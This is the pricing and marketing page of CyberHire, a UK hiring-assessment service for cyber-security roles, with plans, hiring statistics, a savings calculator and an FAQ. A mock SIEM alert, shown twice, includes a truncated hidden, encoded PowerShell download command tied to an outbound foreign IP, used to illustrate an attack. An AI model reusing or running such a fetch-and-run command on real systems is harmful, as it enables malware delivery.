CyberHire
Request invitation

The bit nobody puts on a pricing page

The real cost isn't the subscription. It's dropping the ball.

Hiring cyber roles is the highest-consequence decision your team makes. Every gap, every rushed offer, every "they interviewed really well" has a consequence down the line. Make your hiring decisions defensible.

Free Trial

Kick the tyres for two weeks.

£0 £0 /mo

14 days, no card 14 days, no card

Request invitation
  • 5 candidate invites
  • 1 team seat
  • Library access (limited)
  • 3 AI credits
  • Standard integrity
  • Secure & Proctor modes
  • Custom branding

Starter

For growing teams.

£299 £249 /mo

per month, billed monthly £2,988 billed annually

Request invitation
  • 25 attempts / month
  • 3 team seats
  • Library of 75 challenges
  • 10 AI credits / month
  • Standard + Secure integrity
  • Proctor mode
  • Custom branding
Most popular

Pro

Hiring often. Multiple roles. Branded.

£799 £669 /mo

per month, billed monthly £8,028 billed annually

Request invitation
  • 250 attempts / month
  • 10 team seats
  • Full library (155+ challenges)
  • 30 AI credits / month
  • All three integrity tiers
  • Custom branding
  • Custom email templates

Enterprise

MSSPs and larger security functions.

£1,499 £1,249 /mo

per month, billed monthly £14,988 billed annually

Request invitation
  • 500 attempts / month
  • Unlimited team seats
  • Full library + early access
  • 75 AI credits / month
  • All three integrity tiers
  • Custom branding
  • Dedicated account manager

Our Starter plan costs about 30% of one day's billable consultancy.

The state of UK cyber hiring, if you're brave enough to look

12 weeks

Time-to-fill for a typical UK cyber role. Senior roles stretch to 6 months.

DCMS Cyber Security Skills in the UK Labour Market, 2024

£ 15,000

Typical recruiter placement fee on a £75k cyber hire. Before anyone touches a keyboard.

Hays Cyber Salary Guide UK, 2024

71 %

Of SOC analysts report burnout. Every vacancy makes the rest of the team more likely to walk.

Tines Voice of the SOC, 2024

11,200

Annual UK cyber workforce shortfall. The maths does not work without better hiring.

DCMS Cyber Security Skills Labour Market, 2024

02:17 AM · A Tuesday

Nobody gets breached because the SIEM failed.

It happens because the person watching it marked the alert as a false positive, closed the ticket, and went back to their coffee. Detection and response is only as good as the eyeballs monitoring it.

detections · queue
02:17:04 UTC
Critical ALT-8847291

Encoded PowerShell via LOLBin · outbound to AS12389

Host
WKST-FIN-0043
Dest
194.67.204.12 · RU
MITRE
T1059.001 · T1140

$ powershell.exe -nop -w hidden -enc JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQ...

The seven-figure detection stack did its job. It fired the alert. What happens next is the part nobody budgets for.

What happens next

  1. 02:17

    Alert closed as false positive

    One click. Ticket gone. Coffee refilled.

  2. 02:41

    Lateral movement begins

    Beacon pivots to the file server. Nobody paging.

  3. 04:32

    Ransomware detonates

    214 endpoints encrypted before the next shift starts.

  4. 09:00

    The board call

    CISO on the phone to the cyber insurer. The SIEM logs are immaculate.

Why it happened

The industry has a problem. We're doing things backwards.

What every framework says

01
02
03

Start with

People

~60%

Write the

Process

~25%

Deploy the Technology

~15%

NIST. ISO 27001. SANS. CIS. Pick any framework. They all start here.

Where the money actually goes

01
02
03

Throw money at

Technology

~80%

Paper over with

Process

~15%

Whatever is left over for People

~5%

The seven-figure SIEM. All-singing all-dancing XDR. Zero-trust. NIDS. IAM. DLP. All the gear, no idea.

The frameworks lead with people because they are the foundation. A capable team will build the processes that ensure your technology stack is adequately scoped, configured, deployed and monitored.

02:17 AM · Same alert, different call

The Tuesday that didn't break.

Same SIEM. Same queue. Same 02:17 alert. A different hand on the mouse. This is what people-first looks like when it's done properly.

detections · queue
02:17:04 UTC
Critical ALT-8847291

Encoded PowerShell via LOLBin · outbound to AS12389

Host
WKST-FIN-0043
Dest
194.67.204.12 · RU
MITRE
T1059.001 · T1140

$ powershell.exe -nop -w hidden -enc JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQ...

Same alert. Same queue. Same 7h 43m on shift. The only variable that changed is how the person at the keyboard got there.

What happens instead

  1. 02:17

    Alert escalated correctly

    Tier 2 paged. Playbook opened. Zero hesitation.

  2. 02:21

    IOCs confirmed, host isolated

    MTTD: 4 minutes. The beacon never got its second callback.

  3. 02:34

    Containment complete

    MTTR: 17 minutes. Lateral movement halted before the pivot.

  4. 09:00

    Morning stand-up

    Audit trail filed. No breach. No disclosure. No phone call to the insurer.

The downstream effect

What a capable team does to your security metrics.

01 · MTTD

Alerts actioned at 02:17, not 09:00.

The hand on the mouse catches what matters. Detection stops being a graveyard shift nobody trusts.

The one that matters

Fewer incidents ever reach the threshold where you have to call the regulators.

The breach that never happened is the strongest KPI you have. Capable analysts keep more incidents on your side of the disclosure line. The board call you never had to make.

Breach risk · down

02 · MTTR

Containment in minutes, not days.

The playbook gets run, not read. Lateral movement stops at the pivot, not the post-mortem.

03 · Dwell time

Attackers evicted before they get comfortable.

Persistence kicked out, accounts rotated, host isolated. No weeks-long stays in your environment.

04 · Compliance

Audit-ready because the work happens.

The controls work because a capable team runs them. Evidence writes itself, not the wiki.

05 · Triage accuracy

The real threat doesn't get closed by accident.

A capable analyst triages under pressure. True positives get escalated. False positives get closed. Nothing important buried in the routine clicks.

This is what people-first looks like when you fund it. The stack you already paid for, finally earning its keep.

Consultants usually charge for this

So what's the real cost? Let's run the numbers.

Your current spend isn't just money. It's your team drowning. It's the mis-hire on a PIP. It's the incident the security team missed. Here's what it looks like.

Your situation

Tell us how you hire today

5
130+
£72,500
£35k£180k
60%
We don't use recruitersAll of them
20%
10%30%
43h
10h (lean)80h (enterprise loop)
84 days
20 days240 days
25%
0%50%

The honest breakdown

Where your money goes today

Current annual hiring cost

per year

£0

  • Recruiter fees £0
  • Team time on screening + interviews £0
  • Unfilled-role productivity loss £0
  • Cost of bad hires (conservative) £0

CyberHire Pro costs

£0 / yr

Where CyberHire saves you money

  • Screening + interview time £0
  • Faster time-to-fill £0
  • Fewer bad hires £0
  • Minus CyberHire plan 0

Net annual saving

£0

You build a team you can defend in a board meeting. In a fraction of the time. With fewer bets you'll regret.

0x return · pays for itself in 1.2 roles

Start free trial

And the stuff you can't put on a spreadsheet

0 weeks

Of senior engineering time, back in your calendar. Not in interview rooms.

0 days

Of role vacancy eliminated across the year. Faster shortlists, fewer gaps in coverage.

0 mis-hires

That you don't have to unwind six months from now. No awkward conversations. No re-recruiting.

Stronger posture

Every seat filled faster is one fewer gap in your defences. The average UK breach costs £3.58m.

Honest assumptions. We do not claim to reduce recruiter fees. If you use recruiters, you'll keep using them. What we do: compress screening + interviewing to ~35% of current hours, cut time-to-fill by ~30%, and slash your bad-hire rate to ~20% of baseline (tests on real tools expose the people who interview well but can't do the job). Loaded hourly cost modelled as salary × 1.5 ÷ 1,820 working hours. Numbers rounded. The buckets you'd still spend on with CyberHire are left out of the savings number. Your mileage will vary.

Just the financial part

One wrong cyber hire costs more than a decade of CyberHire.

A bad UK cyber hire runs between 30% and 3x first-year salary once you tot up wasted pay, severance, rehiring, ramp time, and the drag on everyone who had to cover. On a £75k role that's £22,500 at the floor, £225,000 at the ceiling.

Low-end estimate

£22,500

30% of first-year salary. US Department of Labor floor, widely quoted as conservative.

Defensible UK mid-range

£132,015

On a £42k mid-manager, per REC and Oxford Economics. 3.15x salary once everything is tallied.

Senior / CISO mis-hire

£225,000+

3x first-year salary on a £75k role. Higher still for heads of security where the risk of a breach enters the equation.

Sources: REC & Oxford Economics, CIPD Resourcing Survey, US BLS via SHRM. IBM Cost of a Data Breach 2024 for the breach figure. Tines Voice of the SOC 2024 for the attrition one. Every number on this page can be traced back to its source.

Come back if you want a call

Try it.
You'll never go back.

14 days free. Invitation only. Request a code, get up and running in minutes. No demo required. No sales call required.

Request your invitation code Talk to sales

14 days free · No credit card · Code in your inbox once we have reviewed

Questions worth answering

FAQ.

Do I need to book a sales call to see pricing?

No. Every plan, every price, every limit is on this page. We do not believe in gatekeeping pricing.

Why is Pro the most popular plan?

Because it is the one that pays for itself fastest. At £799 a month you get 250 attempts, the full challenge library (including the Linux Terminal, PowerShell and KQL simulators), AI-generated custom tests, custom branding, all three integrity tiers, and priority support. If you hire more than two cyber roles a year, Pro will save you more than it costs in the first placement.

This feels expensive for a hiring tool. Is it worth it?

Compare it to the alternative. A single UK cyber placement through a recruiter averages £15,000 at 20% of a £75k salary. The annual cost of Pro is £8,028. If CyberHire helps you replace one recruiter engagement, or catch one mis-hire before they sign, the rest of the year is free. The calculator above does this math against your own numbers.

We only hire occasionally. Does this still make sense?

Yes if you care about who you hire. One bad cyber hire in the UK costs between 30% and 3x first-year salary once you factor wasted pay, severance, rehiring and team impact. On a £75k role that is £22,500 on the low end, £225,000 on the high end. Starter at £249 a month pays for itself the first time you avoid one. If you hire fewer than four roles a year and never use recruiters, Starter is the right tier.

Is there a free trial?

Yes. 14 days, no credit card. The trial gives you 5 invites, 1 seat, library access (limited), 3 AI credits, and Standard integrity settings. More than enough to try the product and see whether you like it.

How do you measure usage, invites or attempts?

We measure attempts. An attempt is one person taking your hiring test. We do not deduct from your monthly allowance for inviting candidates, only for the candidates who actually start a test.

What are the three integrity tiers?

Standard tracks tab switching, copy and paste, and keystroke patterns with no enforcement. Secure adds enforcement on top: forced fullscreen and blocked copy/paste. Proctor adds periodic webcam monitoring during the test, with explicit candidate consent. You pick the tier per assessment. Standard is on every plan, Secure is included from Starter, Proctor is included from Pro.

Can I switch plans mid-cycle?

Yes. Upgrades take effect immediately and we prorate the difference. Downgrades take effect at the end of the current billing cycle so you do not lose what you already paid for.

What is an AI credit?

One AI credit generates one custom test or one custom challenge from a job spec or a description. Credits refresh monthly. Unused credits do not roll over. Top-up packs are available if you burn through your monthly allowance.

Do you offer custom plans for MSSPs or enterprise security teams?

Yes. Enterprise covers most teams above 500 attempts a month. If you need more attempts, SSO, or a custom contract, get in touch.

What happens to our data if we cancel?

You stay on read-only access for 30 days so you can export results and candidate histories. After 30 days we schedule a full purge. Nothing is retained beyond the statutory minimums.

Where is candidate data stored?

United Kingdom. All processing happens in the UK. We are a UK GDPR-aligned data controller. The candidate privacy notice and data processing addendum are linked in the footer.

What payment methods do you accept?

Card payments through Stripe. Annual contracts can be invoiced (Net 15) on Pro and Enterprise if you need a purchase order.

Can I cancel anytime?

Yes. Cancel from the billing page. No retention call, no exit interview, no email sequence trying to talk you out of it.